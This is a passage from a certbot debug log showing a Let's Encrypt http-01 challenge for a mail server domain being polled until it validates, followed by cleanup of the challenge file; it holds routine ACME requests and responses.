"ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - }, - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - } - ] -} -2026-02-14 23:36:11,657:DEBUG:acme.client:Storing nonce: QkEzerAfnau7eqIPQLWPi5a5DIy_NF1ZI7xZf78WAZQj3BB2Jmc -2026-02-14 23:36:11,658:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'} -2026-02-14 23:36:11,658:INFO:certbot._internal.auth_handler:Performing the following challenges: -2026-02-14 23:36:11,658:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='mail.hanmocnn.co.kr') -2026-02-14 23:36:11,659:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. -2026-02-14 23:36:11,659:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge -2026-02-14 23:36:11,660:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24 -2026-02-14 23:36:11,661:DEBUG:acme.client:JWS payload: -b'{}' -2026-02-14 23:36:11,665:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZm5hdTdlcUlQUUxXUGk1YTVESXlfTkYxWkk3eFpmNzhXQVpRajNCQjJKbWMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2L3AycVRiQSJ9", - "signature": "UAkT6hrIidAF2zSXH_PgoxAhMbBqy_mGKDijU4JjeR5s9HJfpDcVaSqee9oN5yCkCrXnNsH9zK9wzdDgxpIDjmJkFYbjk-M_cvwcZrVOUvcMN2hND8WUmi1qFo4g6H5ac3vnrSQGmezZWqbL89jsesiFdiNTT3nybD9MDgKYNkCK9uYfvvbptHfJjqDUZxcK9_diXeEMM2k5dCm24HJ7S5wq6XJaT8UPdzpjOYy7eBwe_HoibdZbq1eSvUahqkn1EKhFherx9Jd2SezsfLyWhMELL_TX18ioAV7WpbjGCZHdA_u2A8F2qZ43VDdTMn0ojFwn0po9RLHcyRGViSkvmg", - "payload": "e30" -} -2026-02-14 23:36:11,847:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/3064386906/658784998136/p2qTbA HTTP/1.1" 200 195 -2026-02-14 23:36:11,847:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:36:11 GMT -Content-Type: application/json -Content-Length: 195 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index", ;rel="up" -Location: https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA -Replay-Nonce: QkEzerAfyFjzenBtnWm5ThEx-u50IhDeHdl1yAtHn2-mTwQsAHY -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" -} -2026-02-14 23:36:11,848:DEBUG:acme.client:Storing nonce: QkEzerAfyFjzenBtnWm5ThEx-u50IhDeHdl1yAtHn2-mTwQsAHY -2026-02-14 23:36:11,848:INFO:certbot._internal.auth_handler:Waiting for verification... -2026-02-14 23:36:12,849:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:36:12,854:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnlGanplbkJ0bldtNVRoRXgtdTUwSWhEZUhkbDF5QXRIbjItbVR3UXNBSFkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0", - "signature": "OQKujp_YXK3K3_7tpgFsoWLqJKMQ32y9o4du19oagQFikl-ooY1XplCBv0vZ2Cy7cjtAvXbYNW1ghSEZFV6biikNZPikRUQYgKs_bLwWZ-0i1Kn8lMFYAwx0mAjkzOpKuIuwrtRkK9lJ32NbbUrk4DDt4KLvvvyPbEyQPebyyJgT38lnbjt-4oiiWZbxHuEvZ1bvnqcsQ-tZAd4qvKRAn7_Vbxl6saSycUUqSzigxEZzHFu4IlSaxDZrU0vnlNv8cf40HD6cvbd6BIEsTpEKBm-yeurlMUiyJo2NRoD_rwhuqSzXFOxEbVwG8dfsTpe0buuj9UZN2H0zwsgs8Q8u2w", - "payload": "" -} -2026-02-14 23:36:13,032:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827 -2026-02-14 23:36:13,032:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:36:12 GMT -Content-Type: application/json -Content-Length: 827 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: QkEzerAflncOZ2f0u4eATJ9eSGomWMbHzbsJNBK62N4voB5ey8s -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "mail.hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-21T23:36:11Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - }, - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - }, - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - } - ] -} -2026-02-14 23:36:13,033:DEBUG:acme.client:Storing nonce: QkEzerAflncOZ2f0u4eATJ9eSGomWMbHzbsJNBK62N4voB5ey8s -2026-02-14 23:36:13,033:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'} -2026-02-14 23:36:16,034:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:36:16,039:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZmxuY09aMmYwdTRlQVRKOWVTR29tV01iSHpic0pOQks2Mk40dm9CNWV5OHMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0", - "signature": "wtj2sJb8hLpscvxxPJsaTgcupXELXXz3myVAWrKl-H_NLOj9Pj9MNJAFctIQcGrhD18FT62piRVaPXqhCgHA5T60IInIsA8Dkw2nJ_nO7lUXyDPBvkUy4zIiyws4ltD88TM8H2cJ1X11l_wSsRxBdUHS-lZcCxKZN-QWc7Wjq3hJ0qsQ0Nwob1yMVqodkVG_o9K5f9oM56A63Zq4iaSBqs28NrNgLE2yq5KpzV8IOpoLSrCStcsOiZmfF8edr8wvncdBWCJdbkhhlQAVfDCQwcTybTaiAXN6Xru5S7xjgUBcnI8xAChomx4_rlPuAk09wPpYDItLjPKLAMRq29u2dA", - "payload": "" -} -2026-02-14 23:36:16,216:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827 -2026-02-14 23:36:16,217:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:36:16 GMT -Content-Type: application/json -Content-Length: 827 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: qLPTsdtfe4idDbaofJZEFmdD8V0V6aCrW_ZaD1VYSQc3EaWyUK4 -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "mail.hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-21T23:36:11Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - }, - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - }, - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - } - ] -} -2026-02-14 23:36:16,217:DEBUG:acme.client:Storing nonce: qLPTsdtfe4idDbaofJZEFmdD8V0V6aCrW_ZaD1VYSQc3EaWyUK4 -2026-02-14 23:36:16,217:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'} -2026-02-14 23:36:19,218:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:36:19,223:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZmU0aWREYmFvZkpaRUZtZEQ4VjBWNmFDcldfWmFEMVZZU1FjM0VhV3lVSzQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0", - "signature": "ciW6DyQP78rgmZ51FyebnqW3KJL-Uy0ywjJZmLJyQrJ4XrIu-Ez9FYjZz26LLb4tQOOq8rXagdVrZxz-Lxsix8ZeUKbdl64oo0SM4gNkmym9vtieX4hpYoattzSRfwU11cnFU6TS71zfLyFUbFqqBZRDwYnqG400lFNfskR3Sid2xMNs5nFDqdQHHjjr7WW_AiaeGHxtLvuGVmnlSbKaW-06uUKqmafzkvIbSb0YtvfiYQtdhTdjnFwvSStUbaRILk_qk4TX_yqTgolzrFEHHXuwuMRknrDVAaPbqVKRCULFyhRWc73sY7RD_dJqdAyBuiiFH-fiWE0OcqSeVn5PJw", - "payload": "" -} -2026-02-14 23:36:19,401:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827 -2026-02-14 23:36:19,401:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:36:19 GMT -Content-Type: application/json -Content-Length: 827 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: qLPTsdtfUlY8XCOMYlSi2vd46PnCUhYRfLnBpl_jWN1WcGK44m8 -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "mail.hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-21T23:36:11Z", - "challenges": [ - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - }, - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - }, - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - } - ] -} -2026-02-14 23:36:19,402:DEBUG:acme.client:Storing nonce: qLPTsdtfUlY8XCOMYlSi2vd46PnCUhYRfLnBpl_jWN1WcGK44m8 -2026-02-14 23:36:19,402:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'} -2026-02-14 23:36:22,403:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:36:22,408:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZlVsWThYQ09NWWxTaTJ2ZDQ2UG5DVWhZUmZMbkJwbF9qV04xV2NHSzQ0bTgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0", - "signature": "FeEWQxADvM2U39b3BudpI4fbKijrnNyjRMuioQY1M9xqYMddQRCVrEB1wgskJpptl9bXVPM3_dziTWrLoXZeOe2fHk0tctPgFVznmUNZ2brEBe_73jmNjxBmiVWLDyVp_vj0onI0ViwCWBrNvCysuQjceVKNHH37SbcAiS1hOkHrM3goEdVCp3PoZIWLB1YpYGBDFNkBcsDAvFCqFc2_-Ui_3qPNmyoG9gcr5tGM2AMhIgFBGDc5cGKEKbpbakliROV6vd7nzKgUqFiZgBGx_lb2AGd54BSUY9eS7j6uXq3GwaXKCVDKsDZYZKxsgAslt215LDzsMSiW8TbEVzk2Uw", - "payload": "" -} -2026-02-14 23:36:22,585:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827 -2026-02-14 23:36:22,586:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:36:22 GMT -Content-Type: application/json -Content-Length: 827 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: qLPTsdtfZSPw3OwZzqqGDC5sVorVx2_eKsz74AzvgSTf6Jzzlm4 -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "mail.hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-21T23:36:11Z", - "challenges": [ - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - }, - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - }, - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - } - ] -} -2026-02-14 23:36:22,586:DEBUG:acme.client:Storing nonce: qLPTsdtfZSPw3OwZzqqGDC5sVorVx2_eKsz74AzvgSTf6Jzzlm4 -2026-02-14 23:36:22,586:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'} -2026-02-14 23:36:25,587:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:36:25,592:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZlpTUHczT3daenFxR0RDNXNWb3JWeDJfZUtzejc0QXp2Z1NUZjZKenpsbTQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0", - "signature": "EPwBlNMTpV945kv0wjedT5sN_-EZ66YiQ2hMIMnk642rDcmD3QxXvRorvW-UZXGOW-zDH9_FJ6mXnxHm0TmbVp3qHXIRHhmM7pJKTuuO5Q9bh2Tg5iquTnkOwGhYRSAL9947GxQP6SWAP2tw5LgC3QNDNfh_PQu477BX_SPUI_7N3XksR2_YRq5FJMRGiLAHzJ6a4jS8Qw7iVYUu-JXUNuWDcWr2qBAjUA4wFJDBLZP1bKCOP0GNenx78BAjjlqGxOA6y6U_Vve2hQpRrnMkdFpn0JaqVi7S54VN8_cdv6VFs1nvfAKWR7mFWSFUp8y5-oeRU6t0dw88O2FCb4Gtvw", - "payload": "" -} -2026-02-14 23:36:25,782:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827 -2026-02-14 23:36:25,783:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:36:25 GMT -Content-Type: application/json -Content-Length: 827 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: qLPTsdtftvIGI-AgfpmS47Trma8dIcmIOln0-CDc_3wXfIK3OAw -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "mail.hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-21T23:36:11Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - }, - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - }, - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - } - ] -} -2026-02-14 23:36:25,783:DEBUG:acme.client:Storing nonce: qLPTsdtftvIGI-AgfpmS47Trma8dIcmIOln0-CDc_3wXfIK3OAw -2026-02-14 23:36:25,784:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'} -2026-02-14 23:36:28,784:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:36:28,789:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZnR2SUdJLUFnZnBtUzQ3VHJtYThkSWNtSU9sbjAtQ0RjXzN3WGZJSzNPQXciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0", - "signature": "ilecAhgNDvzPhyiO67TcRdjIDVfiU0R-f14MptFH87fuaoeWltWtdAvii0u2s0rT8LCVj5s_3yWws2JKZliij4kgeaksgvEYgpFd8ht5NJggstzEYOruP_5v-_8Ud9kNHikz2xp7NDI8og7Xot9W3ZWUU1JuCisf5_uGie1ioUF-hUs63igiRmm3SctLS0TDMbdgIlIebINPebWxUyR_phtnojgqb3N_oVwreilYxw3LWb8vYheiVa69g3hvaFL43dTRTVUXU_3u-Ta1VcK62DVs_WMsA81Bve-jYuWnHMgfZnULW_uSYF_3Sf5vSBq_F3MSN2b2by7IBhWWyKU0ow", - "payload": "" -} -2026-02-14 23:36:29,051:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827 -2026-02-14 23:36:29,052:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:36:28 GMT -Content-Type: application/json -Content-Length: 827 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: qLPTsdtfmP9T29KLfsnuCiAy8NZJQArGPJFz89iLRfrTIc6DT2c -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "mail.hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-21T23:36:11Z", - "challenges": [ - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - }, - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - }, - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - } - ] -} -2026-02-14 23:36:29,053:DEBUG:acme.client:Storing nonce: qLPTsdtfmP9T29KLfsnuCiAy8NZJQArGPJFz89iLRfrTIc6DT2c -2026-02-14 23:36:29,053:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'} -2026-02-14 23:36:32,054:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:36:32,058:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0Zm1QOVQyOUtMZnNudUNpQXk4TlpKUUFyR1BKRno4OWlMUmZyVEljNkRUMmMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0", - "signature": "Tj9IfzTtdCz-q_KVAJw7VwfALBFcfX8LhCyucOzvGJ6pP_pp5bA730VtR0j4heL81Hwfaz1Gsq44Yb_qGmqmEE3pYoeFS0JvN2b_nsEijMAx9P4Oxu0Ufrwduw0gUOPvk9IwbrrQ6eTbkpVJ7X2xxIdnAPueSkaA_lkYC6PxqJ3PIIRW9Ozfss3u-gXcYixZLFKEIMXoSGreZ4ipwY3jNfjJN_eaycbOz0bY-ln3ht_xTDCg44mWEtePtUp6b1q4fSqzY7bTcGlWpY_xsSPsWmUH8VZYqQfnS9Ias-7GySRJrH15uTbCv4N2F_JbDYxk61-xY_u7AN7S5UyeVWNlQw", - "payload": "" -} -2026-02-14 23:36:32,236:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 780 -2026-02-14 23:36:32,237:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:36:32 GMT -Content-Type: application/json -Content-Length: 780 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: qLPTsdtfmEvYkK_wxHKF9RSfcUUT1wUzsAB17jCVh9NDs3ikgz0 -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "mail.hanmocnn.co.kr" - }, - "status": "valid", - "expires": "2026-03-16T23:36:30Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA", - "status": "valid", - "validated": "2026-02-14T23:36:11Z", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24", - "validationRecord": [ - { - "url": "http://mail.hanmocnn.co.kr/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24", - "hostname": "mail.hanmocnn.co.kr", - "port": "80", - "addressesResolved": [ - "222.117.41.51" - ], - "addressUsed": "222.117.41.51" - } - ] - } - ] -} -2026-02-14 23:36:32,237:DEBUG:acme.client:Storing nonce: qLPTsdtfmEvYkK_wxHKF9RSfcUUT1wUzsAB17jCVh9NDs3ikgz0 -2026-02-14 23:36:32,237:DEBUG:certbot._internal.error_handler:Calling registered functions -2026-02-14 23:36:32,238:INFO:certbot._internal.auth_handler:Cleaning up challenges -2026-02-14 23:36:32,238:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24 -2026-02-14 23:36:32,238:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up -2026-02-14 23:36:32,239:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE 